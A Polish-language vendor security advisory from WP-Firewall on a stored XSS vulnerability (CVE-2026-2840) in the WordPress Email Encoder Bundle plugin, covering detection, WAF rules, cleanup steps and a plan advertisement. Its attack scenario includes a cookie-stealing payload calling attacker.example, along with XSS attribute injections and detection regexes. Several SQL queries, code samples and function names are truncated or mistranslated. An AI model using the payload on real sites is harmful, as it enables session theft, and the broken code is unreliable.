Krytyczne XSS w WordPress Email Encoder//Opublikowano 2026-04-16//CVE-2026-2840

ZESPÓŁ DS. BEZPIECZEŃSTWA WP-FIREWALL

Email Encoder Bundle Plugin Vulnerability

Nazwa wtyczki Wtyczka WordPress Email Encoder Bundle
Rodzaj podatności Atak typu cross-site scripting (XSS)
Numer CVE CVE-2026-2840
Pilność Niski
Data publikacji CVE 2026-04-16
Adres URL źródła CVE-2026-2840

Krytyczna poprawka dostępna dla przechowywanego XSS w wtyczce “Email Encoder Bundle” (CVE-2026-2840) — Co właściciele stron WordPress muszą teraz zrobić

Fragment: Przechowywana podatność na Cross-Site Scripting (XSS) wpływająca na Email Encoder Bundle (<= 2.4.4) pozwala uwierzytelnionym współautorom wstrzykiwać ładunki za pomocą shortcode eeb_mailto. CVE-2026-2840 jest naprawione w 2.4.5. Oto praktyczny, skoncentrowany na bezpieczeństwie plan działania dotyczący wykrywania, łagodzenia i ograniczania z perspektywy zapory WordPress i operacji bezpieczeństwa.

Autor: Zespół ds. bezpieczeństwa WP-Firewall
Data: 2026-04-16
Tagi: WordPress, podatność, XSS, WAF, reakcja na incydenty, bezpieczeństwo wtyczek

Streszczenie: Przechowywana podatność XSS (CVE-2026-2840) została ujawniona w wtyczce WordPress Email Encoder Bundle, która wpływa na wersje do 2.4.4. Uwierzytelnieni użytkownicy z rolą Współautora mogą wstrzykiwać ładunki zdolne do wykonywania skryptów za pomocą shortcode eeb_mailto; te ładunki mogą być wykonywane później, gdy użytkownik o wyższych uprawnieniach wchodzi w interakcję z wstrzykniętą treścią. Autor wtyczki wydał poprawkę w 2.4.5. Jeśli prowadzisz strony WordPress, postępuj zgodnie z poniższymi wskazówkami w celu natychmiastowego i długoterminowego łagodzenia.

Dlaczego powinieneś się tym przejmować (szybki przegląd)

Przechowywane XSS jest jedną z najniebezpieczniejszych podatności aplikacji internetowych, ponieważ złośliwy skrypt jest trwale przechowywany na stronie i wykonywany w kontekście przeglądarek innych użytkowników. W tym przypadku:

  • Wtyczka podatna na ataki: Email Encoder Bundle (wszystkie wersje <= 2.4.4)
  • Typ podatności: Przechowywane Cross-Site Scripting (XSS) za pomocą shortcode eeb_mailto
  • CVE: CVE-2026-2840
  • Wersja z poprawką: 2.4.5 (zaktualizuj natychmiast)
  • Wymagane uprawnienia atakującego: Współautor (uwierzytelniony). Jednak skuteczne wykorzystanie wymaga interakcji użytkownika z użytkownikiem o wyższych uprawnieniach (np. redaktorem lub administratorem) — na przykład kliknięcia w przygotowany link lub podglądania treści.

Chociaż wykorzystanie wydaje się ograniczone przez rolę i interakcję użytkownika, nadal jest poważne. Napastnicy często wykorzystują przechowywane XSS do kradzieży ciasteczek sesyjnych, eskalacji uprawnień, instalacji tylnej furtki, manipulacji treścią lub uzyskania dostępu administracyjnego za pomocą inżynierii społecznej.

Natychmiastowe kroki (co zrobić teraz)

  1. Zaktualizuj wtyczkę do 2.4.5 lub nowszej na każdej dotkniętej stronie
    To jest najważniejszy krok. Autor wtyczki wydał poprawkę w 2.4.5, która rozwiązuje tę podatność.
  2. Zastosuj tymczasowe wirtualne łatanie za pomocą swojej WAF
    Jeśli nie możesz natychmiast zaktualizować (np. kontrole stagingowe, testy zgodności), zastosuj zasady WAF, aby zablokować próby wykorzystania (zasady podane później w tym przewodniku).
  3. Audytuj ostatnie zgłoszenia Współautorów i poprawki postów
    Sprawdź treści stworzone lub edytowane przez użytkowników z niższymi rolami (Współautor, Autor). Szukaj podejrzanych shortcode mailto i atrybutów, które zawierają JavaScript lub zdarzenia HTML.
  4. Zmień hasła i sekrety, jeśli podejrzewasz kompromitację
    Jeśli znajdziesz dowody na wykorzystanie, zmień dane logowania administratora, wygeneruj na nowo hasła aplikacji i zresetuj klucze (AUTH_KEY, SECURE_AUTH_KEY itp.).
  5. Zwiększ monitorowanie i rejestrowanie
    Tymczasowo włącz szczegółowe logowanie serwera WWW i PHP. Obserwuj nietypowe żądania stron administracyjnych, POST-y lub edycje z kont użytkowników z uprawnieniami współtwórcy.

Jak działa luka (wyjaśnienie techniczne)

Wtyczka zapewnia shortcode eeb_mailto który koduje adresy e-mail do wyświetlenia. Problem polega na tym, że współtwórca może przesłać wartości dla atrybutów shortcode, które nie są odpowiednio oczyszczone/ucieczone przed zapisaniem i późniejszym renderowaniem w HTML. Jeśli nieoczyszczone atrybuty są wyświetlane na stronie bez odpowiedniego uciekania lub zabraniania schematów JavaScript, atakujący może stworzyć atrybuty przypominające:

  • Wartość atrybutu zawierająca schemat JS: email="javascript:..."
  • Atrybut z wstrzyknięciem atrybutu HTML: email='" onmouseover="
  • Zakodowane obsługiwacze zdarzeń lub elementy skryptu wstawione do wyjścia (zależy od ścieżki renderowania)

Gdy użytkownik o wyższych uprawnieniach (lub jakikolwiek użytkownik) przegląda stronę lub klika stworzony link, złośliwy JavaScript działa w przeglądarce ofiary z pochodzeniem podatnej witryny — co pozwala na kradzież sesji, działania CSRF lub inne złośliwe zachowania.

Najważniejsze punkty:

  • Przechowywane XSS jest trwałe — ładunki są zapisywane w bazie danych.
  • Rola współtwórcy wystarcza do zapisywania treści (która może być podglądana przez redaktorów/adminów).
  • Udana eksploitacja zazwyczaj wymaga interakcji użytkownika, ale często jest łatwa do zaprojektowania (np. poprzez link w poście).

Potwierdzone wskaźniki i wzorce wyszukiwania

Przeszukaj swoją bazę danych i treści w poszukiwaniu podejrzanych wzorców. Przydatne zapytania do znalezienia możliwych ładunków:

  • Przeszukaj posty i rewizje w poszukiwaniu podejrzanych shortcode lub tagów skryptów:
SELECT ID, post_title, post_author, post_date;
  • Znajdź postmeta z podejrzaną treścią:
SELECT meta_id, post_id, meta_key, meta_value;
  • Przeszukaj treści i komentarze przesłane przez użytkowników (jeśli komentarze są dozwolone):
WYBIERZ comment_ID, comment_post_ID, comment_author_email, comment_content;
  • Przeszukaj logi w poszukiwaniu podejrzanych wzorców (przykład):
grep -Ei "eeb_mailto|javascript:|onerror=|onclick=" /var/log/nginx/* /var/log/apache2/*
  • Szukaj postów utworzonych/zaktualizowanych przez użytkowników z rolą współtwórcy w okresie zainteresowania:
WYBIERZ ID, post_title, post_author, post_date;

Notatka: Zmień prefiksy tabeli (wp_) na prefiks twojej witryny.

Zasady WAF do blokowania eksploatacji (wirtualne łatanie)

Jeśli zarządzasz zaporą aplikacji internetowej (WAF) lub twój dostawca hostingu oferuje jedną, szybko zastosuj wirtualne łatanie podczas testowania aktualizacji.

Przykład zasad w stylu ModSecurity (dostosuj do swojego silnika i przetestuj w stagingu):

  • Blokuj kody skrótów z osadzonym skryptem: przechwyć żądania, które wstawiają ciągi kodów skrótów zawierające zdarzenia skryptowe
SecRule REQUEST_BODY "@rx \[eeb_mailto[^\]]*(?:javascript:|on(?:click|mouseover|error|load|submit)\=|<script\b)" \"
  • Blokuj opublikowane treści, które zawierają schemat javascript: w atrybutach
SecRule REQUEST_BODY "@rx javascript\s*:" \"
  • Blokuj żądania, które próbują tworzyć lub aktualizować posty zawierające podejrzane zdarzenia:
    – Dla POSTów administratora WordPressa (edycja postu), wykryj podejrzane wzorce:
SecRule REQUEST_URI "@rx /wp-admin/post.php|/wp-admin/post-new.php" \"

Uwagi:

  • Testuj ostrożnie, aby uniknąć fałszywych pozytywów. Najpierw ustaw zasady w trybie wykrywania (tylko logowanie).
  • Zastosuj zasady do blokowania tylko nieufnych przesyłek treści — np. POSTów od uwierzytelnionych współtwórców lub ładunków, które pasują do powyższych wzorców regex.

Przykład sygnatury WAF dla silników zasad, które obsługują regex

Użyj konserwatywnego regex i dostosuj do swojego środowiska:

/\[eeb_mailto[^\]]*(javascript:|on(?:click|mouseover|error|load|submit)\s*=|<script\b)/i

To dopasowuje skróty eeb_mailto z prawdopodobnie złośliwymi ładunkami. Ponownie, najpierw tylko loguj, a następnie blokuj po dostosowaniu.

Rekomendacje dotyczące wzmocnienia kodu (po stronie dewelopera)

Jeśli utrzymujesz motywy/wtyczki lub jesteś deweloperem pracującym z skrótami, oto solidne praktyki kodowania, aby zapobiec przechowywanemu XSS:

  1. Sanitizuj przy zapisie
    Oczyść dane wejściowe użytkownika, gdy są zapisywane w bazie danych (nie tylko przy wyjściu). Użyj funkcji takich jak sanitize_email, dezynfekcja_pola_tekstowego, wp_kses_post (z surowo dozwolonymi tagami), esc_url_raw dla pól przypominających URL.
  2. Ucieczka na wyjściu
    Zawsze escape'uj wartości tak blisko wyjścia, jak to możliwe, używając esc_html, esc_attr, esc_url, esc_js, w zależności od kontekstu.
  3. Ogranicz dozwolone schematy URL
    Używać wp_allowed_protocols() lub surowszej białej listy, aby zapobiec JavaScript: URI.
    Przykład: jeśli akceptujesz linki mailto:, pozwól tylko na mailto i bezpieczne warianty przypominające mailto.

Przykład: bezpieczniejszy handler skrótów

&lt;?php

Ważny: unikaj konstruowania atrybutów lub wstrzykiwania surowego HTML z niezaufanego wejścia bez escape'owania.

Jak wykryć aktywne naruszenie (znaki, na które należy zwrócić uwagę)

  • Nieoczekiwane logowania administratorów lub sesje pochodzące z nietypowych adresów IP.
  • Nowi użytkownicy administratorów lub podwyższone uprawnienia utworzone bez autoryzacji.
  • Posty, strony lub media, których nie utworzyłeś.
  • Ukryte skrypty w post_content, widgetach lub plikach motywu (szukaj base64, eval, document.write i przekierowań JS).
  • Podejrzane wychodzące połączenia HTTP z serwera (sprawdź zaporę lub netstat).
  • Niezwykłe żądania do /wp-admin/post.php z POSTami zawierającymi treść shortcode eeb_mailto.

Przykłady wyszukiwania kryminalistycznego:

  • Znajdź tagi skryptów w bazie danych:
SELECT ID, post_title, post_date, post_author;
  • Znajdź wystąpienia URI javascript:
SELECT ID, post_content;

Kroki czyszczenia i ograniczenia, jeśli znajdziesz złośliwą treść

  1. Kwarantanna treści
    Wycofaj publikację dowolnego posta/strony lub zmień status na roboczy, jeśli podejrzane.
  2. Usuń lub zdezynfekuj zainfekowane posty
    Usuń złośliwe wystąpienie shortcode z treści i zaktualizuj post.
    Przywróć z znanego dobrego kopii zapasowej, jeśli treść posta została poważnie skompromitowana.
  3. Zresetuj dane logowania administratora i hasła użytkowników
    Wymuś reset hasła dla wszystkich uprzywilejowanych użytkowników.
  4. Unieważnij sesje i hasła aplikacji
    Cofnij hasła aplikacji i unieważnij zalogowane sesje, gdzie to możliwe.
  5. Skanuj w poszukiwaniu powłok webowych/tylnych drzwi
    Sprawdź pliki motywu/wtyczek i przesyłki pod kątem nieoczekiwanych plików PHP, z obfuskującym kodem lub plików z ostatnimi znacznikami czasowymi. Przykłady do sprawdzenia w /wp-content/przesyłanie/ lub katalogach motywów.
  6. Sprawdź zaplanowane zadania (crons).
    Złośliwi aktorzy mogą tworzyć zdarzenia cron, aby utrzymać dostęp.
  7. Przejrzyj logi serwera i przeanalizuj
    Zidentyfikuj, skąd pochodził atak, jak treść została opublikowana i czy użyto innych łańcuchów ataków.
  8. Powiadom interesariuszy.
    Jeśli dane użytkowników lub użytkownicy administracyjni zostali dotknięci, postępuj zgodnie z polityką ujawniania incydentów. Wymień sekrety.

Po incydencie: zapobieganie i długoterminowe wzmocnienie

  • Zasada najmniejszych uprawnień
    Ogranicz, które role mogą tworzyć treści z potencjalnie wykonywalnym wyjściem. Na przykład, ogranicz możliwość wstawiania shortcode'ów lub używania HTML do określonych ról.
    Rozważ, czy współtwórcy naprawdę potrzebują nieprzefiltrowanego HTML lub użycia shortcode'ów.
  • Moderacja treści/proces roboczy
    Wymagaj przeglądu redakcyjnego dla treści tworzonych przez współtwórców. Użyj wtyczek moderacyjnych lub ręcznego przeglądu dla nowych postów.
  • Utrzymuj wtyczki, motywy i rdzeń w aktualizacji.
    Stosuj aktualizacje zabezpieczeń w odpowiednim czasie, korzystając z testów stagingowych, gdy jest to wymagane.
  • Wprowadź ciągłe skanowanie
    Zaplanowane skanowanie złośliwego oprogramowania i kontrole integralności dla plików rdzeniowych.
  • Wzmocnij dostęp administratora
    Uwierzytelnianie dwuskładnikowe (2FA) dla redaktorów i administratorów.
    Biała lista adresów IP dla wrażliwych stron administracyjnych, gdzie to możliwe.
  • Kopie zapasowe i odzyskiwanie danych
    Utrzymuj czyste i częste kopie zapasowe z przetestowanymi procedurami przywracania.

Przykładowe zasady wykrywania dla SIEM / monitorowania logów

  • Powiadomienia o POST-ach, które zawierają ciąg “[eeb_mailto” z uwierzytelnionych kont współtwórców:
    Zasada: Jeśli rola uwierzytelnionego użytkownika == współtwórca I TREŚĆ POST-a zawiera “[eeb_mailto” I (‘javascript:’ | ‘onerror=’ | ‘onclick=’) => powiadomienie o wysokim priorytecie.
  • Powiadomienia dla administratorów o podglądzie lub edytowaniu stron, gdy treść posta zawiera lub javascript: => utwórz incydent.
  • Częste nieudane próby logowania z tego samego adresu IP lub nagły duży liczba postów od jednego autora => podejrzane.

Przykładowa lista kontrolna działań dla zespołów operacyjnych

  • Zaktualizuj wtyczkę do 2.4.5 na wszystkich stronach.
  • Uruchom zapytania wyszukiwania w bazie danych w celu wykrycia podejrzanych użyć shortcode i oczyść lub usuń.
  • Włącz ukierunkowane zasady WAF (najpierw loguj, potem blokuj).
  • Zmień hasła wszystkich użytkowników z uprawnieniami i klucze tajne.
  • Unieważnij sesje i hasła aplikacji.
  • Skanuj system plików w poszukiwaniu powłok webowych/backdoorów i znanych wskaźników.
  • Przeskanuj ponownie za pomocą skanera złośliwego oprogramowania po oczyszczeniu.
  • Wprowadź ponownie treść dopiero po weryfikacji i wzmocnieniu.
  • Udokumentuj incydent i harmonogram.

Wskazówki dla deweloperów: lista kontrolna bezpiecznego projektowania shortcode

  • Nigdy nie ufaj wejściu: oczyszczaj wcześnie, escape'uj późno.
  • Waliduj typy danych i formaty (np. waliduj e-maile z is_email()).
  • Podczas linkowania do zewnętrznych URI, weryfikuj dozwolone schematy (mailto:, https:, http:).
  • Usuń obsługiwacze zdarzeń i atrybuty skryptowe z jakiegokolwiek dostarczonego przez użytkownika markup.
  • Używaj nonce'ów i sprawdzania uprawnień dla punktów końcowych AJAX i działań administracyjnych.
  • Ogranicz, które role mogą przesyłać treści, które będą renderowane bez escape'u.

Przykładowe pomocniki do oczyszczania

Powszechne, przetestowane pomocniki:

  • sanitize_email() — dla e-maili
  • dezynfekuj_pole_tekstowe() — dla zwykłego tekstu
  • wp_kses_post() — dla kontrolowanego HTML
  • esc_html(), esc_attr(), esc_url() — ucieczka dla kontekstów wyjściowych

Przykład: Dozwolone schematy URL na białej liście i sanitizacja

<?php

Dlaczego przechowywane XSS pozostaje głównym zagrożeniem na stronach WordPress

Strony WordPress często mieszają wiele wtyczek i motywów. Małe niedopatrzenie w sanitizacji danych dostarczonych przez użytkowników może wystarczyć, aby umożliwić przechowywane XSS. Eksploatacja na skalę przemysłową jest powszechna, ponieważ napastnicy mogą tworzyć konta współpracowników (np. za pomocą skompromitowanych kont lub wyciekłych danych uwierzytelniających) i wstrzykiwać ładunki, które pozostają w uśpieniu, aż zostaną uruchomione przez użytkownika z wyższymi uprawnieniami.

Nawet gdy eksploatacja wymaga interakcji użytkownika, napastnicy są biegli w tworzeniu wiarygodnych wektorów inżynierii społecznej — wewnętrznych podglądów, e-maili aktualizacyjnych lub udostępnionych linków do współautorstwa — które skłaniają do niezbędnych kliknięć.

Praktyczny scenariusz (realistyczny przykład)

  • Napastnik rejestruje konto i uzyskuje rolę Współpracownika (lub kompromituje istniejące).
  • Korzystając z możliwości współpracownika, przesyłają post, który zawiera shortcode eeb_mailto z atrybutem takim jak email='"&gt;<img src="x" onerror="fetch("https:>' Lub email='javascript:fetch("https://attacker.example/steal?c="+document.cookie)'.
  • Redaktor podgląda post lub klika stworzony link mailto w interfejsie administracyjnym. Skrypt działa w przeglądarce redaktora, ujawniając ciasteczka sesji lub wykonując akcje.
  • Z konta redaktora napastnik lub złośliwy skrypt mogą tworzyć administratorów, instalować złośliwe wtyczki lub wykradać dane.

Rozważania dotyczące komunikacji i ujawnienia

  • Jeśli prowadzisz zarządzaną stronę, poinformuj interesariuszy, gdy tylko znajdziesz dowody na kompromitację.
  • Podaj zwięzłe podsumowanie: co się stało, jakie dane (jeśli w ogóle) mogły zostać ujawnione, jakie działania naprawcze podjąłeś oraz zalecane kroki następcze dla użytkowników końcowych (np. resetowanie haseł).
  • Zachowaj logi i artefakty kryminalistyczne przez pewien czas, aby wspierać analizę.

Praktyczne przykłady: polecenia wyszukiwania i usuwania

  • Szybkie grep, aby znaleźć możliwe wstrzyknięte shortcody mailto w wyeksportowanej treści:
wp db query "SELECT ID, post_title FROM wp_posts WHERE post_content LIKE '%[eeb_mailto%';"
  • Usuń shortcode ze wszystkich postów (niebezpieczne — najpierw zrób kopię zapasową):
wp db query "UPDATE wp_posts SET post_content = REPLACE(post_content, '[eeb_mailto', '[eeb_mailto-sanitized' ) WHERE post_content LIKE '%[eeb_mailto%';"

(Używaj masowej zamiany tylko wtedy, gdy w pełni rozumiesz konsekwencje. Zawsze najpierw zrób kopię zapasową.)

Rekomendacje dotyczące monitorowania

  • Monitoruj nowe aktualizacje wtyczek i stosuj krytyczne poprawki w ciągu 24–72 godzin, w zależności od apetytu na ryzyko.
  • Wprowadź dzienniki aktywności administratora, aby zobaczyć, kto tworzył/edytował posty.
  • Używaj zaplanowanych skanów złośliwego oprogramowania i kontroli integralności witryny.
  • Przechowuj szczegółowe dzienniki serwera i sieci przez co najmniej 30–90 dni, aby ułatwić dochodzenia.

Opcje cenowe i ochrony — krótki przegląd planu

WP-Firewall oferuje zróżnicowane plany zabezpieczeń dostosowane do różnych potrzeb:

  • Podstawowy (bezpłatny) — Podstawowa ochrona: zarządzana zapora, nielimitowana przepustowość, WAF, skaner złośliwego oprogramowania i łagodzenie ryzyk OWASP Top 10.
  • Standardowy ($50/rok) — Dodaje automatyczne usuwanie złośliwego oprogramowania oraz możliwość dodawania do czarnej/białej listy do 20 adresów IP.
  • Pro ($299/rok) — Pełna ochrona, w tym miesięczne raporty bezpieczeństwa, automatyczne wirtualne łatanie podatności oraz premium dodatki, takie jak Dedykowany Menedżer Konta i Usługi Zarządzane Bezpieczeństwa.

Jeśli chcesz natychmiast chronić swoją witrynę podczas łatania i audytu, oferujemy darmowy plan podstawowy, który obejmuje natychmiastowe wirtualne łatanie i regularne skany. Zarejestruj się w darmowym planie tutaj: https://my.wp-firewall.com/buy/wp-firewall-free-plan/

Nowy nagłówek, aby przyciągnąć uwagę: Zabezpiecz swoją witrynę dzięki darmowej zarządzanej ochronie zapory

Zarejestruj się w WP-Firewall Basic (darmowy) i uzyskaj zarządzaną ochronę zapory, solidny WAF, skanowanie złośliwego oprogramowania oraz automatyczne łatanie dla 10 najważniejszych podatności OWASP — łatwy zabezpieczający plan podczas łatania wtyczek i usuwania wszelkiego pozostałego ryzyka. Poświęć chwilę, aby zabezpieczyć swoje witryny teraz: https://my.wp-firewall.com/buy/wp-firewall-free-plan/

Ostateczne rekomendacje i podsumowanie

  • Natychmiast zaktualizuj wtyczkę Email Encoder Bundle do wersji 2.4.5 lub nowszej na wszystkich witrynach.
  • Jeśli nie możesz zaktualizować natychmiast, zastosuj zasady wirtualnego łatania na poziomie WAF i kwarantannuj podejrzane treści.
  • Audytuj treści stworzone przez konta Contributor i szukaj przypadków shortcode'ów eeb_mailto oraz atrybutów przypominających skrypty.
  • Wzmocnij procesy: ogranicz uprawnienia, wymagaj przeglądu redakcyjnego, utrzymuj kopie zapasowe i monitoruj dzienniki.
  • Jeśli znajdziesz dowody na wykorzystanie, postępuj zgodnie z listą kontrolną ograniczenia (kwarantanna treści, rotacja poświadczeń, skanowanie w poszukiwaniu tylnej furtki i przywracanie z czystych kopii zapasowych w razie potrzeby).

Bezpieczeństwo to proces ciągły. Łatanie to najszybsza droga do naprawy, ale wirtualne łatanie, monitorowanie i wzmocnienie procesów zmniejszają powierzchnię ataku, aż każda witryna będzie mogła zostać zaktualizowana. Jeśli chcesz natychmiastowej zarządzanej ochrony zapory podczas triage i łatania, rozważ plan WP-Firewall Basic (darmowy) — zapewnia wirtualne łatanie i skanowanie oparte na WAF, aby szybko zmniejszyć ryzyko: https://my.wp-firewall.com/buy/wp-firewall-free-plan/

Bądź bezpieczny, bądź na bieżąco z łatanie i nie wahaj się skontaktować z zaufanym specjalistą ds. bezpieczeństwa WordPress, jeśli znajdziesz oznaki kompromitacji lub potrzebujesz pomocy w naprawie.

wordpress security update banner

Otrzymaj WP Security Weekly za darmo 👋
Zarejestruj się teraz!!

Zarejestruj się, aby co tydzień otrzymywać na skrzynkę pocztową aktualizacje zabezpieczeń WordPressa.

Nie spamujemy! Przeczytaj nasze Polityka prywatności Więcej informacji znajdziesz tutaj.

Skontaktuj się z nami, aby zaplanować bezpłatną konsultację dotyczącą bezpieczeństwa WordPress

Skontaktuj się z nami

Zapora sieciowa WP
6/F, The Rays, 71 Hung To Road, Kwun Tong, Kowloon, Hongkong

Cechy Wycena Blog Login
Polityka prywatności Warunki korzystania z usługi Dokumenty Przyłączać

© 2026 WP-Firewall™